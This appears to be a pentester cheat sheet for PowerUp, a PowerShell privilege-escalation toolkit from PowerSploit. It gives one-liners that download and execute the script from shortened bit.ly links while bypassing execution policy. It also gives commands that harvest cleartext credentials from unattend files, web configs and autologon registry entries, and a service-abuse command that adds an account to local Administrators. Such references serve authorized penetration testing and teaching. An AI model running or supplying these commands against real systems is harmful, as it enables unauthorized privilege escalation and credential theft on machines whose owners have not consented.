Powerup

Initial Execution

# Load from disk
Powershell.exe -nop -exec bypass
. .\powerup.ps1

# Load from Github
Powershell IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")

# Invoke-AllChecks
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

# Invoke-AllChecks and load script in one command
powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}

# Invoke-AllChecks without touching disk
 powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks”

Commands

Miscellaneous

# Check for credentials in unattend.xml files
Get-UnattendedInstallFile

# Get cleartext credentials and encrypted strings from web config files
Get-Webconfig

# Get current user tokens and privileges
Get-ProcessTokenPrivilege

Services

# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose

# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose

#Get the services whose configuration the current user can modify
Get-ModifiableService -Verbose

# Exploit vulnerable service 
Invoke-ServiceAbuse -Name "Vuln-Service" -Command "net localgroup Administrators security.local\moe /add"

Registry

# Checks if MSI files are always installed in context of SYSTEM
Get-RegistryAlwaysInstallElevated

# Checks if any autologon credentials exists in registry locations
Get-RegistryAutologon

# Gets autoruns where the current user can modify the script or binary
Get-ModifiableRegistryAutoRun

References

PowerUp Cheatsheet For Pentesters - Certcube Labs Cyber Security Research BlogsCertcube labs Cyber Security Research Blogs

PowerSploitpowersploit.readthedocs.io

Last updated 3 years ago